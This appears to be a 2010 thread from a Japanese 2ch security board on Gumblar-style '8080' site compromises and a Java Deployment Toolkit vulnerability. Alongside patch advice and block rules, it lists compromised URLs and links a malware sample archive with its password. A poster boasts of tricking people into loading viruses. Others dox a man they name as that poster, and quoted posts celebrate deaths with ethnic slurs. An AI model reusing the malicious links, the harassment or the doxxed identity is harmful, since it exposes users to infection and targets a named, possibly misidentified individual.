ttp://lock.cmpxchg8b.com/bb5eafbc6c6e67e11c4afc88b4e1dd22/testcase.html
ただ、本当に情報が少なくてこれが緩和策になっているのかよくわからない。
0747名無しさん@お腹いっぱい。
2010/04/13(火) 04:42:37どゆことなの?出されたIPを調べたらnpo-aichi.or.jpって出たが
npo-aichiの登録・技術担当と倉敷CATVの技術担当が同じって事?
もしその通りって事だと倉敷CATVは今感染してなくとも危ないって事?
0748名無しさん@お腹いっぱい。
2010/04/13(火) 05:23:51Operaでプラグイン入れてないと読み込みが完了しないかんじ。
>>747
大家と店子の関係
0749名無しさん@お腹いっぱい。
2010/04/13(火) 06:41:420750名無しさん@お腹いっぱい。
2010/04/13(火) 06:55:320751名無しさん@お腹いっぱい。
2010/04/13(火) 12:07:50http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2211
0752コテハン ◆8080adndqg
2010/04/13(火) 13:27:30d3d3LmFtYWt1c2F0dXJpZ3UuY29tLw0K
----
6Zml6JC944K144Kk44OI44GuVVJM44KS6YGK44Gz44O744GE44Gf44Ga44KJ55uu55qE44Gn6LK84
4KL44GK44OQ44Kr44GV44KT44Gv44CB6ISz44G/44Gd44Gu44Kv44Oq44O844Oz44Kk44Oz44K544
OI44O844OrKOWGjeaVmeiCsinjgYzlv4XopoHjgaDjgajmgJ3jgo/jgozjgb7jgII=
・・・ということですw
0753名無しさん@お腹いっぱい。
2010/04/13(火) 13:33:4077y8KF5vXinvvI/jgqrjg6/jgr8=
0754名無しさん@お腹いっぱい。
2010/04/13(火) 13:43:43http://www.footsal-club.net/
http://www.oracle-shop.net/
http://pacific-staff.net/
http://hoikuen.19th.org/
http://sunrise.2pg.in/
http://netnavi.boo.jp/leopalace/link/
http://www.toutyann.com/
http://ayaka.echoll.net/
http://dog-g-club.com/
http://www.bestofunder.com/
http://moebox.com/link.html
http://www.ferahdondurma.com/
http://www.e-tokunaga.co.jp/contents/house_dock/index.html
http://www.vericapandilovska.com.mk/
http://this.is/ausgot/
http://capvex.com/
http://egujarat.net/
http://jyo.eisuku.com/home/
http://www.borneomarathon.com/jpn/home.html
http://www.aparajeyo.org/index.php
http://www.niaufuku.com/index.htm
http://kumarin.biz/
http://www.amakusaturigu.com/html/
http://www.bandoolshien.com/
http://www.hdta.jp/
きゅ〜い!きゅ〜い!(キリッ
0755名無しさん@お腹いっぱい。
2010/04/13(火) 13:56:150756名無しさん@お腹いっぱい。
2010/04/13(火) 13:57:180757名無しさん@お腹いっぱい。
2010/04/13(火) 14:20:55M0ElMkYlMkZwYzExLjJjaC5uZXQlMkZ0ZXN0JTJGcmVhZC5jZ2klMkZzZWMlMkYxMjY4MDU5Njg0
JTJGNzU0JmJvbzIwMDhfdGltZT0yMDEwJTJGMDQlMkYxMyUyOCU4OSVDRSUyOSsxMyUzQTQzJTNB
NDMmYm9vMjAwOF9pZD0mYm9vMjAwOF9wb3J0PSZib28yMDA4X3RyaXA9
>>753
77y8KF5vXinvvI/jgqrjgr/jg68=
0758名無しさん@お腹いっぱい。
2010/04/13(火) 14:47:250759名無しさん@お腹いっぱい。
2010/04/13(火) 17:31:250760名無しさん@お腹いっぱい。
2010/04/13(火) 17:44:46J2SE runtime Environment 5.0 update6と
Java(TM)6 update19が一緒に存在してるんだ
これは更新の仕様がないJ2SEを消すべき?それとも両方とも置いておかないといけないモノ?
0761名無しさん@お腹いっぱい。
2010/04/13(火) 18:06:25古いの消せ
0762コテハン ◆8080adndqg
2010/04/13(火) 18:16:50>串迎撃部隊@2ch掲示板 -- Boo2008 --
>Good bye 9000
>がいしゅつ!!Done ! -> [BBQ]None(^-^)
>名も無きBoo2008さん、ありがとうですm(_ _)m
>\(^o^)/オワタ
0763名無しさん@お腹いっぱい。
2010/04/13(火) 18:28:23IGh0dHA6Ly9qYS53aWtpcGVkaWEub3JnL3dpa2kvJUUzJTgyJUFBJUUzJTgyJUJGJUUzJTgzJUFG
0764名無しさん@お腹いっぱい。
2010/04/13(火) 19:29:14無くて困ることってなにかある?
0765名無しさん@お腹いっぱい。
2010/04/13(火) 19:30:260767名無しさん@お腹いっぱい。
2010/04/13(火) 20:15:400768名無しさん@お腹いっぱい。
2010/04/13(火) 20:35:27Javaに新たな問題が見つかる、多数のブラウザに影響の恐れ
ttp://www.itmedia.co.jp/enterprise/articles/1004/13/news072.html
Java Deployment Toolkitに見つかった新たな問題
launch()メソッドからJava Web Startユーティリティ(javaws.exe)に任意の引数を渡すことができてしまうという
。攻撃者が悪用した場合、ユーザーが細工されたHTMLを閲覧してしまうことで
リモートから任意のJARファイルを実行されてしまう危険がある。
Java Deployment Toolkitは、Java SE 6 update 10以降をインストールした際に
同時にインストールされる。ブラウザのプラグインやActive-X コントロールとしても利用されるため
Microsoft Internet ExplorerやFirefox、Google ChromeなどWindowsベースの
多数のブラウザに影響が及ぶ可能性がある。
米Oracleの対応は未定。IPAとJPCERT コーディネーションセンターは
当面の回避策として、ActiveX コントロールやブラウザのJava Deployment Toolkitを
無効にすることを推奨している。
0769コテハン ◆8080adndqg
2010/04/13(火) 21:30:07www●tu-han4●com/hatumo/
www●daini-survey●com/
versamold●com/
難読化はムダっぽい...
0770名無しさん@お腹いっぱい。
2010/04/13(火) 23:56:48http://labs-uploader.sabaitiba.com/virus/download/1271170314.zip
infected
0771名無しさん@お腹いっぱい。
2010/04/14(水) 00:00:31IE6/7/8や「Firefox」「Google Chrome」などWebブラウザー全般が対象
http://www.forest.impress.co.jp/docs/news/20100413_360951.html
0772名無しさん@お腹いっぱい。
2010/04/14(水) 08:20:050773名無しさん@お腹いっぱい。
2010/04/14(水) 08:51:00またなんかありそうだから様子見。
てか、もう Foxit に乗り換えたし。
0774名無しさん@お腹いっぱい。
2010/04/14(水) 12:37:10上で述べられてるツールキットは最近の奴だとruntime内蔵なのかな?
そうならどうやって無効化するのか……
ActiveXはインターネットオプションで無効化できるんだが
0775名無しさん@お腹いっぱい。
2010/04/14(水) 13:08:35対象がIEだけなら
ttp://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/full-disclosure/2010.04/msg00133.html
を参考にKill-Bitを追加すればいい。
複数のブラウザを入れていて、個別ではなく一括で対策したいならjavaws.exeのアクセス権を
読み取り実行拒否に変更してやればいい。
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2010/04.html#20100412_JAVA
0776名無しさん@お腹いっぱい。
2010/04/14(水) 14:20:48www●sot●com●al
VirusTotalでの検出結果は5/40(12.5%)
Avast頑張るなぁ
0777名無しさん@お腹いっぱい。
2010/04/14(水) 14:29:12スクリプトに対応しなくても防御はできるが
こういう風に特に初心者にアピールにはなるから一生懸命なのだろう
0778名無しさん@お腹いっぱい。
2010/04/14(水) 14:51:17メインPCでは某ベンダの有料版を使っているが>>770の検体の検出はまちまちだった。
ただ>>754のサイトでは全てに反応した。
avastはソース段階(スクリプト自体)で検出しているが、
某ベンダは実行段階で検出しているようだ。
0779名無しさん@お腹いっぱい。
2010/04/14(水) 15:36:220780名無しさん@お腹いっぱい。
2010/04/14(水) 16:31:500781名無しさん@お腹いっぱい。
2010/04/14(水) 16:38:35AVG Freeが9個しか反応しなかった・・・おぉコワイコワイ
0782名無しさん@お腹いっぱい。
2010/04/14(水) 17:41:13なるほど、オレはもう掛かってるのか!
0783名無しさん@お腹いっぱい。
2010/04/14(水) 17:51:14スルーした3つをhttp://www.virustotal.com/jp/で調べてみれば?
無害かも
0784名無しさん@お腹いっぱい。
2010/04/14(水) 17:55:21つか、最近の亜種だとcmdとregdit動くみたいだし、どういう症状が出るか解らんから
感染してるかどうかすらオンラインスキャン以外じゃわからんよな
0785名無しさん@お腹いっぱい。
2010/04/14(水) 18:00:480786名無しさん@お腹いっぱい。
2010/04/14(水) 18:15:493つとも解析済みで、検出したのはなかったそうだ
再解析してみたら1つだけ出てきた
Gumblar_js.txt
Sophos 4.52.0 2010.04.14 Troj/JSRedir-BD
0787コテハン ◆8080adndqg
2010/04/14(水) 18:25:50www●nittoka●com/ ←そーすの途中にコードが・・・
discussanctuary●com/からコードごと引っ越したのかな?
www●1a●ad-jeaayf●com/ae/
s6●artemisweb●jp/djtsushin/naruto/part1/index●html ←改竄されてるってばよw※jword注意
0788名無しさん@お腹いっぱい。
2010/04/14(水) 18:26:19http://www.daini-survey.com/
http://versamold.com/
http://www.sot.com.al
0789名無しさん@お腹いっぱい。
2010/04/14(水) 19:00:08http://i39.tinypic.com/2z8ybts.png
0790名無しさん@お腹いっぱい。
2010/04/14(水) 19:06:58http://www.1a.ad-jeaayf.com/ae/
http://s6.artemisweb.jp/djtsushin/naruto/part1/index.html
0791名無しさん@お腹いっぱい。
2010/04/14(水) 19:35:421:きゅい〜ん
2:きゅい〜ん
3:403
4:きゅい〜ん
790
1:きゅい〜ん
2:きゅい〜ん
3:きゅい〜ん
avast! 大勝利w
0792名無しさん@お腹いっぱい。
2010/04/14(水) 19:43:520793名無しさん@お腹いっぱい。
2010/04/14(水) 19:45:10なんやねん、それ・・・
0794名無しさん@お腹いっぱい。
2010/04/14(水) 22:45:070795名無しさん@お腹いっぱい。
2010/04/14(水) 23:04:19(4) JRE(Java Runtime Environment)を最新版に更新する
これはAdobe Readerなんかと同じでWindowsをインストールしただけでは
JREはインストールされないよね?
JREをインストールしていなければ特に気にする必要はないんだよね?
PC初心者でちょっとよくわからないので教えてくれると助かります
0796名無しさん@お腹いっぱい。
2010/04/14(水) 23:11:14メーカー製PCにはAdobeReaderもJREもプリインストールされていることがほとんど
0797名無しさん@お腹いっぱい。
2010/04/15(木) 00:38:31ちなみにそのアイコンをダブルクリックするとバージョン確認やアップデートもできる
0798名無しさん@お腹いっぱい。
2010/04/15(木) 01:03:48WindowsをインストールしただけではJAVAは入らないよ
上の人が言うようにメーカー製PCを買った場合は入ってるかもしれない
でもWindowsのCDを使ってOSをインストールしただけではJAVAは入らない
0799名無しさん@お腹いっぱい。
2010/04/15(木) 01:09:310800名無しさん@お腹いっぱい。
2010/04/15(木) 01:31:05ないと思うけどね」みたいな不毛な話になるから自重しろ。
0801名無しさん@お腹いっぱい。
2010/04/15(木) 04:54:15「不正改ざんに関するお詫び」
Last-Modified: Wed, 14 Apr 2010 07:03:06 GMT : www.collco.jp/index.html
0802名無しさん@お腹いっぱい。
2010/04/15(木) 10:39:43http://www.forest.impress.co.jp/docs/news/20100414_361134.html
0803名無しさん@お腹いっぱい。
2010/04/15(木) 13:52:15思うんだが、「不正改ざんされた」ってのは責任逃れだろ。
むしろ、ここのサイト覗いた奴のPC「不正改ざんした」のがこの会社だろうに。
>※本件による、お客様にお預かりしております個人情報の流出はございません。
お前のサイト覗いたせいでパスとか流出する話しないで、どうすんだよ
0804名無しさん@お腹いっぱい。
2010/04/15(木) 14:00:32ttp://java.sun.com/javase/6/webnotes/6u20.html
0805名無しさん@お腹いっぱい。
2010/04/15(木) 15:13:56ちなみにカスペルスキー2010
これはザルなのか?
設定でオフになってるのかと思いきやそうでもないし
0806名無しさん@お腹いっぱい。
2010/04/15(木) 15:59:12Java(TM) Platform SE 6 U20 6.0.200.2
0807名無しさん@お腹いっぱい。
2010/04/15(木) 17:24:18とりあえず>>770の検体送れ。
話はそれからだm9(^Д^)
0808名無しさん@お腹いっぱい。
2010/04/15(木) 17:30:49検体提出汁
0809名無しさん@お腹いっぱい。
2010/04/15(木) 18:38:56反応しないとこは修正済みもあるんじゃね
0810名無しさん@お腹いっぱい。
2010/04/15(木) 21:33:22*の位置が分からん
0811名無しさん@お腹いっぱい。
2010/04/15(木) 21:43:06Java Deployment Toolkit の脆弱性を悪用したゼロディ攻撃を観測
https://www-950.ibm.com/blogs/tokyo-soc/entry/javaws-201004?lang=ja
2010年4月15日、Oracle より Java SE 6 Update 20 がリリースされました[5]。
東京SOCでは、上記バージョンの JRE をインストールすることで、本脆弱性への攻撃を
防げることを確認しております。
0812名無しさん@お腹いっぱい。
2010/04/15(木) 21:43:39>>810
巻き添えにしたくないなら
*.ru:8080/*
0813名無しさん@お腹いっぱい。
2010/04/15(木) 21:50:15最近は.atと.infoも侵食されてるからそれじゃダメ
0814名無しさん@お腹いっぱい。
2010/04/15(木) 22:53:400815名無しさん@お腹いっぱい。
2010/04/15(木) 23:22:42PeerBlockとかあるみたいだけどこれ使えばいいのかな
0816名無しさん@お腹いっぱい。
2010/04/16(金) 00:01:31ブラウザのJAVAScript切っとけ
0817名無しさん@お腹いっぱい。
2010/04/16(金) 00:25:29意味ない
0818名無しさん@お腹いっぱい。
2010/04/16(金) 01:00:32例えば敵方が8090に変った時には8080ブロックは無意味
0819名無しさん@お腹いっぱい。
2010/04/16(金) 03:50:08先のこと考えたら無意味なことばかりだ
現状の防御としては意味があるのだからそれで良いに決まってる
0820名無しさん@お腹いっぱい。
2010/04/16(金) 04:39:03www1●kamakuranet●ne●jp/artinfo/ メル凸済み
心の和む小ネタをひとつ
http://www.aguse.jp/?m=w&url=helphomecare●at%3A8080&x=15&y=13
↓
http://www.aguse.jp/?m=w&url=helphomecare●at&x=52&y=14
↓
http://a001.aguse.jp/images/img/6d53e388eed6c7f0f5b3404a9e7a1e65f4e47f3c/ea280effbf7dbaa378533a69bd2dc1a216ea0eca_00_x.jpg
Fuck off!
0821名無しさん@お腹いっぱい。
2010/04/16(金) 05:27:48んじゃどういうソフト使ってるんですかね
avast!5にはURLブロック付いてるようですが
0822名無しさん@お腹いっぱい。
2010/04/16(金) 05:34:33大概のルーター内蔵のでも可能じゃないか
0823名無しさん@お腹いっぱい。
2010/04/16(金) 07:50:46セキュ板覗くような人間ならデフォで入れてるソフトだと思ってたんだが違うのか。
0824名無しさん@お腹いっぱい。
2010/04/16(金) 08:25:310825名無しさん@お腹いっぱい。
2010/04/16(金) 08:53:13Proxomitron はよく知らないが
難読化されてるスクリプトも簡単にフィルタリングできるのか?
0826名無しさん@お腹いっぱい。
2010/04/16(金) 11:02:00入れてるけど使ってない
0827名無しさん@お腹いっぱい。
2010/04/16(金) 11:08:34無料HPスペースの広告がウザかった時代に使ってたけど、今は使ってない。
>>825
自分でフィルター書かなきゃダメ、もしくは有志の人待ち
0828名無しさん@お腹いっぱい。
2010/04/16(金) 11:28:40パターンが変わればその都度になるが、現行では一応対応できているけど。
最近は変化が無いからつまらん。
0829名無しさん@お腹いっぱい。
2010/04/16(金) 11:32:340830名無しさん@お腹いっぱい。
2010/04/16(金) 11:40:080831名無しさん@お腹いっぱい。
2010/04/16(金) 17:24:39www1●kamakuranet●ne●jp/artinfo/
メル凸先からttp://www.painters-club.com/homepage-artist.html
に連絡は行ったらしいが、なぜか別のページを閉鎖したらしい
0832名無しさん@お腹いっぱい。
2010/04/16(金) 19:41:25ありがとうございます。
とりあえず手持ちのFWでリモートポート8080番をシャットアウトすればいいんですかね?
0833名無しさん@お腹いっぱい。
2010/04/16(金) 20:01:440834名無しさん@お腹いっぱい。
2010/04/16(金) 20:16:36Deployment Toolkitの脆弱性が8080インジェクションで使われ始めてるらしいから
0835名無しさん@お腹いっぱい。
2010/04/16(金) 20:31:40ダウソ板のイカタコなんて、子供の遊びに見えてくるな
0836名無しさん@お腹いっぱい。
2010/04/16(金) 20:37:494月になっても収まらないね。
0837名無しさん@お腹いっぱい。
2010/04/16(金) 21:10:12実際子供の遊びだろ
0838名無しさん@お腹いっぱい。
2010/04/16(金) 21:24:290839名無しさん@お腹いっぱい。
2010/04/16(金) 21:27:470840名無しさん@お腹いっぱい。
2010/04/16(金) 21:34:03これは上書きされたって事でいいのかな
以前の17→19の時は上書きなんてしなかったから「ひょっとして19のプログラム残ってるんじゃないか」って不安
>>2の対策してれば、あとはActiveXやJavaを自動実行したりしないようにすればおkかな
0841名無しさん@お腹いっぱい。
2010/04/16(金) 21:35:390842名無しさん@お腹いっぱい。
2010/04/16(金) 21:42:010843名無しさん@お腹いっぱい。
2010/04/16(金) 21:43:22心配なら入れなおせばおk
0844名無しさん@お腹いっぱい。
2010/04/16(金) 21:54:15xpでjava19から20に上書きしたらfireroxのプラグインに19と20の
Deployment ToolkitがあったのでJava20をアンインストール後に
再度20をインストールした。
そしたら19の姿が消えたので心配なら一度アンインストールをした
方がいいと思う。
0845名無しさん@お腹いっぱい。
2010/04/16(金) 21:56:27それもそうだな……アンインスコして入れ直してみる
そういえば、ここの文字検索でgoogleがいくつかあるんだが、
ひょっとしてgoogle自体もう全て完全に感染してるのか?
PCが重くなってる様子もメモリ異常に食われてるって事もないんだが……
0846名無しさん@お腹いっぱい。
2010/04/16(金) 21:57:420847名無しさん@お腹いっぱい。
2010/04/16(金) 22:12:220848名無しさん@お腹いっぱい。
2010/04/16(金) 22:38:56再度メール出します、ご報告感謝
0849名無しさん@お腹いっぱい。
2010/04/16(金) 23:01:59どれのことを言ってるの?
URLを理解できていないってことならどっかで勉強してきてください
そもそもgoogle自体が感染してたらここで騒がれるとかそういうレベルじゃ収まらんだろ
0850名無しさん@お腹いっぱい。
2010/04/16(金) 23:08:33ごめん、URLと検索ワード読み直して大体把握した
感染サイトを探した結果だったのね……
0851名無しさん@お腹いっぱい。
2010/04/16(金) 23:45:53http://www.virustotal.com/jp/analisis/94ff0b47a595324877d535d963346ccfe8e7c70140327fd95498f14c88279c5a-1271428269
0852名無しさん@お腹いっぱい。
2010/04/17(土) 00:26:078080じゃないはず(8080はJS:Illredir)
GDataはavastエンジン使ってるから実質avastだけ検知
0853名無しさん@お腹いっぱい。
2010/04/17(土) 00:39:400854名無しさん@お腹いっぱい。
2010/04/17(土) 01:08:37海外では3月下旬くらいから出てるのかな
0855名無しさん@お腹いっぱい。
2010/04/17(土) 01:42:02定義自体は2009/02/18に追加
0856名無しさん@お腹いっぱい。
2010/04/17(土) 02:30:10http://www.plci.net/egf/
0858(VДV) ◆yUyb3Tqn92
2010/04/17(土) 07:12:05ガンブラをガンプラスレにでも貼り貼りしてきますかのう( VдV)
( ´,дゝ`)フォッフォフォフォーwww
0859名無しさん@お腹いっぱい。
2010/04/17(土) 07:42:20ようお前にこないだウイルス踏まされたもんじゃボケ!
お前の本名、斎藤智成だろ?住所もググったらあったから請求書送るから待っとけや!w
0860名無しさん@お腹いっぱい。
2010/04/17(土) 07:50:19その方が話が早いだろ
0861名無しさん@お腹いっぱい。
2010/04/17(土) 08:00:270862(VдV) ◆yUyb3Tqn92
2010/04/17(土) 08:39:58俺様にウィルス踏まされる時点で自己管理が悪いわけで、つまり踏む奴が悪いわけで
これはもう暗黙の了解ならぬ暗黙の常識なわけで(>w<)変な人だなぁプクススススwwwwwwwwwwwwww
(VдV)しかも請求書ってなにいってるんだ?
もし俺様が踏ませたウィルスの影響で金銭的な損害を受けたのだとしたら
それは・・・
(VДV)ざまあみろだぜ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
0863(VдV) ◆yUyb3Tqn92
2010/04/17(土) 08:42:01youtubeでその回見なきゃなんないんだ。
やっぱ80年代の神アニメはうる星やつらだよね。
(*VдV*)デヘヘヘヘヘヘヘベヘヘケヘヘヘヘヘヘヘヘヘヘケewwwwwwwwwwwwwwp
0864名無しさん@お腹いっぱい。
2010/04/17(土) 09:12:220865名無しさん@お腹いっぱい。
2010/04/17(土) 09:18:040866名無しさん@お腹いっぱい。
2010/04/17(土) 09:56:21/?N=A
/?M=D
/?S=D
/?D=D
/?N=A
0867866
2010/04/17(土) 09:57:320868名無しさん@お腹いっぱい。
2010/04/17(土) 10:05:27ウイルス感染したPCでスキャンしても絶対安全と保障できないぞ
心当たりあるんなら素直にクリーンインスコしたほうが良いよ
>>2完璧に実行してブラウザ常時仮想化とかしてて「俺がウイルス感染なんかするわけねーだろばーか!」なら自分を信じていいだろうが
0869名無しさん@お腹いっぱい。
2010/04/17(土) 11:05:56言ってる事は解らなくもないがこのスレ全否定してるよな、4行目でスレ住人の卑下までやってるし
クリーンインスコなんてみんながみんなホイホイできるわけでもないだろうに
0870名無しさん@お腹いっぱい。
2010/04/17(土) 11:38:09【間接正犯】
http://ja.wikipedia.org/wiki/%E9%96%93%E6%8E%A5%E6%AD%A3%E7%8A%AF
8080作者のコードを悪用して何等かの被害が発生した時点で成立。
0871名無しさん@お腹いっぱい。
2010/04/17(土) 12:46:53これぞ本当のざまあ ->862
0872名無しさん@お腹いっぱい。
2010/04/17(土) 13:23:210873名無しさん@お腹いっぱい。
2010/04/17(土) 13:24:21アクセスログなら何か試そうとしたんじゃね
0874866
2010/04/17(土) 13:58:06ユーザーディレクトリでのアクセスで
このコマンド?じゃ何も出来ないと思うけど、何かに感染したPCからの痕跡なのか...
ただ、面白いのは、IP調べると日本のM$専用線からのアクセスで
こっそり調べると鯖では無く、クライアントPCっぽい。
0875名無しさん@お腹いっぱい。
2010/04/17(土) 14:41:03>間接正犯とは、他人の行為を利用して自己の犯罪を実現する正犯のことである。
>共犯ではないというのが通説である。
<中略>
>正犯とは、犯罪実現の現実的危険性を有する行為を自ら行う者をいうが、
>「自ら」は規範的理解が可能(緩やかに解することが可能)とする。
>そのうえで、他人を道具として利用する場合は、規範的には「自らの手で」行ったといえ、
>利用者の行為には正犯としての実行行為性が認められるとされる。
8080作者と同じ罪になるって事で・・・
顔文字(糞コテ)オワタwwwwwwww
0876名無しさん@お腹いっぱい。
2010/04/17(土) 14:46:45奴らの調査力なら顔文字野郎の個人情報なんてすぐに割れるだろ。
0877名無しさん@お腹いっぱい。
2010/04/17(土) 15:01:170878名無しさん@お腹いっぱい。
2010/04/17(土) 15:13:53誰も投下しないのであった
0879名無しさん@お腹いっぱい。
2010/04/17(土) 15:16:420880名無しさん@お腹いっぱい。
2010/04/17(土) 18:24:50【ウィルス入りURLを踏ませることは犯罪か?】
ttp://ruhuraro.blog57.fc2.com/blog-entry-161.html
※見る時はhttp://gw.aguse.jp/経由を推奨
ウイルス入りURLを踏ませる事に対しての直接的な罪は問えないけど
感染後のPCで発生する被害(情報流出が起きる場合)については罪を問えるのです。
※個人情報ぁぅぁぅとか・・・
つまり、8080系の作者のコードが埋め込まれた陥落サイトを
ウイルスに感染する可能性があると知っていて
「その危険性を知らせずに貼った」場合
誰かが踏んで被害が発生した時点で>>870が成立=刑事罰を問えるという事。
糞コテのブログには「踏ませるのが趣味」と書いてあるので
酌量の余地は全くありません()笑
0881U.F.O ◆U.F.OnbYNA
2010/04/17(土) 18:32:17早く規制されてほしいな。
というか規制からやっと復活したがその間にこんなにガンブラーでてたんだな・・・
気 を つ け な け れ ば
>>880
つまりこの糞コテを訴える事も出来るわけか。
顔文字ざまぁwwwwwm9(^Д^)プギャーwwwww
0882名無しさん@お腹いっぱい。
2010/04/17(土) 19:32:160883名無しさん@お腹いっぱい。
2010/04/17(土) 19:57:13aHR0cDovL3d3dy5nb29nbGUuY28uanAvc2VhcmNoP2hsPWphJnE9JUU5JTgwJTlEJUUzJ
TgxJUEzJUUzJTgxJUE2JUUzJTgyJTg4JUUzJTgxJTk3KyVFOSVBMSU5NCVFNiU5NiU4Ny
VFNSVBRCU5NyZidG5HPSVFNiVBNCU5QyVFNyVCNCVBMiZscj0=
死語とか言うなよwww
0884名無しさん@お腹いっぱい。
2010/04/17(土) 20:02:390885名無しさん@お腹いっぱい。
2010/04/17(土) 22:53:06通報した
0886名無しさん@お腹いっぱい。
2010/04/17(土) 23:47:400887名無しさん@お腹いっぱい。
2010/04/17(土) 23:56:16ttp://jbbs.livedoor.jp/bbs/read.cgi/game/36137/1192213469/l50
0888名無しさん@お腹いっぱい。
2010/04/18(日) 00:51:430889名無しさん@お腹いっぱい。
2010/04/18(日) 01:16:540890名無しさん@お腹いっぱい。
2010/04/18(日) 02:56:32\
\
,,ヅ彡ニミ;;,, ヅ彡ニミ;;,, l
ィ<" , ‐ 、 ゙ミ、 ィ<" , ‐ 、 ゙ミ、 ゙i
ミミ、, ゝ_゚_,ノ,, イ :ミミ、, ゝ_゚_,ノ,, イ ゙i
゙'ヾ三≡彡'" ゙'ヾ三≡彡' i!
/ ヽ ,. -- 、 i! >>862 しねよ
/ \ / __,>─ 、
/ ',/ ', / ヽ
! l l { |__
、 ,' 、 ,' } \ ,丿 ヽ
ヽ . _ .. ' ヽ . _ .. ' / 、 `┬----‐1 }
/ `¬| l ノヽ
/ 、 !_/l l / }
{ \ l / ,'
\ ´`ヽ.__,ノ / ノ
\ ヽ、\ __,ノ /
 ̄ ヽ、_ 〉 ,!、__/
0891(VдV) ◆yUyb3Tqn92
2010/04/18(日) 03:07:44VдV)ん?
ずいぶんと必死に自演連投をしているようだな
そんなに連続で書き込んでたらいくらIDでなくてもバレバレだぜ
そんなことにも気づけないほど悔しかったのだな( ´,дゝ`)からかった甲斐があるぜ
でも残念ながらその程度の煽りでは不合格
というより残念賞というべきか。
なぜなら5年前からウィルス踏ませ続けてぴんぴんしているのだからな
この事実を覆すことはできないよ(>w<)本当に残念だったな
どぉだ?またムカムカしてきたか?(笑)
(VДV)そうか!じゃあ死ねっ!!!!!!!!(爆)
0892(VдV) ◆yUyb3Tqn92
2010/04/18(日) 03:08:580893(VдV) ◆yUyb3Tqn92
2010/04/18(日) 03:13:01俺様にウィルス踏まされた奴は
俺様がこうやってますます調子に乗り乗り♪してることにムカつきながら俺のこと見てるんだろなw
これだからやめられないお(>w<)快っ感!!!!
0894名無しさん@お腹いっぱい。
2010/04/18(日) 03:28:23「愛するものを守れ」
ブルーレイで出してほしいな…
0895名無しさん@お腹いっぱい。
2010/04/18(日) 03:29:55(VдV) ◆yUyb3Tqn92 =斎藤智成
http://www.unkar.org/read/jfk.2ch.net/mmo/1263347649
更にこの名前でぐぐると携帯番号ヒットした
0896(VдV) ◆yUyb3Tqn92
2010/04/18(日) 05:52:41http://yutori7.2ch.net/test/read.cgi/news4vip/1271515115/
(VДV)頭の悪いVIPのツイッタスレ住人大パニック!ブワハハハハハハハハ!!!!!wWwwWWWwwwW
0897名無しさん@お腹いっぱい。
2010/04/18(日) 05:58:340898(VдV) ◆yUyb3Tqn92
2010/04/18(日) 06:07:26斎藤ならまだしも斉藤とは?(笑)
(VдV)これってまたまた俺様が一本とっちゃった感じ?
つーわけで漢字読めない低脳は死ね!と止めを刺しておこう(VдV)vチェキラ
0899(VдV) ◆yUyb3Tqn92
2010/04/18(日) 06:09:58ウィルス踏ませて笑いながらポテチを食うっ!
とかキラっぽくポテチ食ってるなう!ヽ(VдV)ノなうなうなのらーい
0900名無しさん@お腹いっぱい。
2010/04/18(日) 06:43:351 :斎藤智成 ◆LIuJMgzRRY :2010/03 /03(水) 17:55:35.83 ID:LlEpEw2v0
おい韓国人みてるか!!!???
F-5戦闘機墜落おめでとう!!!よかったね!!!!!おめでとう祭りだわっしょい!
日本にはニートや陰陽師がいるんだぜ
俺達ニートや陰陽師が韓国人が2人死ぬように術式を組んだんだよ
そのためにはなにか関連したもの、繋がりあるものを狙わなければならなかった
だからF-5戦闘機を狙ったのさ!!!!
ざまーみろ!801野郎ども!死ね!せいぜい801プレイでもしてろよキムチ!
文句があるならニートの代表、斎藤智成様のブログを落としてみやがれ!!!
ttp://www.google.co.jp/search?num=100&hl=ja&safe=off&rlz=1B3DVFA_ja___JP330&q=%E9%9F%93%E5%9B%BD%E3%80%80%E6%96%8E%E8%97%A4%E6%99%BA%E6%88%90&btnG=%E6%A4%9C%E7%B4%A2&lr=&aq=f&oq=
0901名無しさん@お腹いっぱい。
2010/04/18(日) 06:49:33ついでにageとく。
韓国、F5戦闘機墜落←ざまーみろ!801ども!
http://yutori7.2ch.net/test/read.cgi/news4vip/1267606535/
「801ども」の使いどころが間違っとるというか・・・
在日なん?
0902(VдV) ◆yUyb3Tqn92
2010/04/18(日) 06:53:05俺様を斉藤でも斎藤智成と思うのもお前の勝手だが
困るのは俺様ではなく斎藤智成なのだよ( ´,дゝ`)頭の悪い奴だなァ
なので斎藤晒しならじゃんじゃんやってOK(Vд^)−☆動画も探せばあるから
それよりまた一仕事してきたので晒しましょ〜う(VзV)♪
http://yutori7.2ch.net/test/read.cgi/news4vip/1271529136/n146-168
0903(VдV) ◆yUyb3Tqn92
2010/04/18(日) 06:59:37今日も踏ませてたら時間を忘れちゃったおw夢のような時間だったお
もしかして俺様って日本一ウィルス踏ませてるコテじゃね?ギネス入りも近い?>w<
なんか最近調子が良い
この調子でますます俺様のファンが増えそうだ
ウィルス踏ませてるのはホント、ゲーム感覚だが
考えてみたらあまりブログには書いてないな〜って思った。
近々気が向いたらブログでそういうの書いてみるわ
昔ヤフチャでボイチャしてる奴にウィルス踏ませてふぁびょってる録音とかあるけど
うpしたら需要あるかな?まーお楽しみに>w<
さて、ドラゴンボールとワンピースまで寝るお
(VдV)おやすみお前ら
0904名無しさん@お腹いっぱい。
2010/04/18(日) 07:12:09>>2のどれも死んでるんだが…。
0905名無しさん@お腹いっぱい。
2010/04/18(日) 07:13:000906名無しさん@お腹いっぱい。
2010/04/18(日) 07:20:080907名無しさん@お腹いっぱい。
2010/04/18(日) 07:44:43IE8のInPrivateフィルターがオンのままだったのに最近気がついた俺って
0908名無しさん@お腹いっぱい。
2010/04/18(日) 08:33:07感染してるのかどうかわからなくて怖いぜ……
オンラインスキャンは推奨だけで十分なんだよな?
0909名無しさん@お腹いっぱい。
2010/04/18(日) 12:15:450910名無しさん@お腹いっぱい。
2010/04/18(日) 12:51:55逆に人柱PCを用意してわざと感染すればメインPCが安全かどうかがわかるんじゃね?
0911名無しさん@お腹いっぱい。
2010/04/18(日) 12:54:18どうやったら感染するんだ?
なんかちゃんと感染してないサイトも多いんじゃないか
0912名無しさん@お腹いっぱい。
2010/04/18(日) 12:54:57↑はログ速の過去ログなんだが
これ踏んだらカスペがヒューリスティックで遮断した
しかしgredで「リンク先のページをチェック」のオプションを使用しないと安全だと言われる(リンク先のページのスキャンを行うと改ざんサイトを検出)し、
